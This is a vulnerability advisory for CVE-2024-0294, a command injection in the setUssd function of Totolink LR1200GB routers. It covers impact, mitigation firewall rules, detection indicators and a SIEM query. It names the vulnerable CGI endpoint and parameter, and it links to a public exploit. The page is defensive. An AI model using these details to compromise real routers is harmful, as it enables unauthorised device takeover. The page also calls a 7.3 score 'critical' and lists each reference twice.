CVE-2024-0294 – This critical vulnerability in Totolink LR1200G... (How to Fix)

Q: What is the severity of CVE-2024-0294?

CVE-2024-0294 has a CVSS score of 7.3 (HIGH). This critical vulnerability in Totolink LR1200GB routers allows remote attackers to execute arbitrary operating system commands through command injection in the setUssd function. Attackers can exploit this to gain full control of affected devices. Only Totolink LR1200GB routers running specific firmware versions are affected.

📋 TL;DR

This critical vulnerability in Totolink LR1200GB routers allows remote attackers to execute arbitrary operating system commands through command injection in the setUssd function. Attackers can exploit this to gain full control of affected devices. Only Totolink LR1200GB routers running specific firmware versions are affected.

💻 Affected Systems

Products:

Totolink LR1200GB

Versions: 9.1.0u.6619_B20230130 (specific firmware version)

Operating Systems: Embedded Linux (router firmware)

Default Config Vulnerable: ⚠️ Yes

Notes: The vulnerability exists in the default web interface configuration. No special configuration is required for exploitation.

📦 What is this software?

Lr1200gb Firmware by Totolink

View all CVEs affecting Lr1200gb Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, intercept traffic, or use the device for botnet activities.

🟠

Likely Case

Remote code execution leading to device takeover, credential theft, and network reconnaissance.

🟢

If Mitigated

Limited impact if devices are behind firewalls with strict inbound filtering and network segmentation.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable and public exploits exist, making internet-facing devices immediate targets.

🏢 Internal Only: MEDIUM - Internal devices are still vulnerable to attackers who gain initial network access through other means.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public exploit code is available on GitHub. The attack requires no authentication and is simple to execute.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: None available

Restart Required: No

Instructions:

No official patch is available. The vendor did not respond to disclosure attempts. Consider replacing affected devices or implementing workarounds.

🔧 Temporary Workarounds

Disable Web Management Interface

all

Disable the vulnerable web interface to prevent remote exploitation

Access router CLI via SSH/Telnet
Navigate to web interface settings
Disable web management or restrict to local network only

Network Access Control

linux

Restrict access to router management interface using firewall rules

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
iptables -A INPUT -p tcp --dport 443 -j DROP

🧯 If You Can't Patch

Isolate affected routers in a separate VLAN with strict network segmentation
Implement outbound traffic monitoring to detect command and control activity

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via web interface at System Status > Firmware Version or via CLI command: cat /proc/version

Check Version:

cat /proc/version or check web interface at System Status > Firmware Version

Verify Fix Applied:

Test if the setUssd endpoint is still accessible and vulnerable by attempting to access /cgi-bin/cstecgi.cgi with ussd parameter

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /cgi-bin/cstecgi.cgi with ussd parameter
Suspicious command execution in system logs
Failed authentication attempts followed by successful exploitation

Network Indicators:

Unusual outbound connections from router to unknown IPs
Traffic patterns indicating command and control communication
Port scanning originating from router

SIEM Query:

source="router_logs" AND (uri="/cgi-bin/cstecgi.cgi" AND parameter="ussd") OR (process="sh" OR process="bash" AND parent_process="httpd")

📊 Metadata

CVE ID: CVE-2024-0294

CVSS v3 Score: 7.3 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-78

Published: January 8, 2024

Last Updated: November 21, 2024

🔗 References

https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md Exploit,Third Party Advisory
https://vuldb.com/?ctiid.249860 Permissions Required,Third Party Advisory,VDB Entry
https://vuldb.com/?id.249860 Third Party Advisory,VDB Entry
https://github.com/jylsec/vuldb/blob/main/TOTOLINK/LR1200GB/setUssd/README.md Exploit,Third Party Advisory
https://vuldb.com/?ctiid.249860 Permissions Required,Third Party Advisory,VDB Entry
https://vuldb.com/?id.249860 Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-0294, you might also want to check these: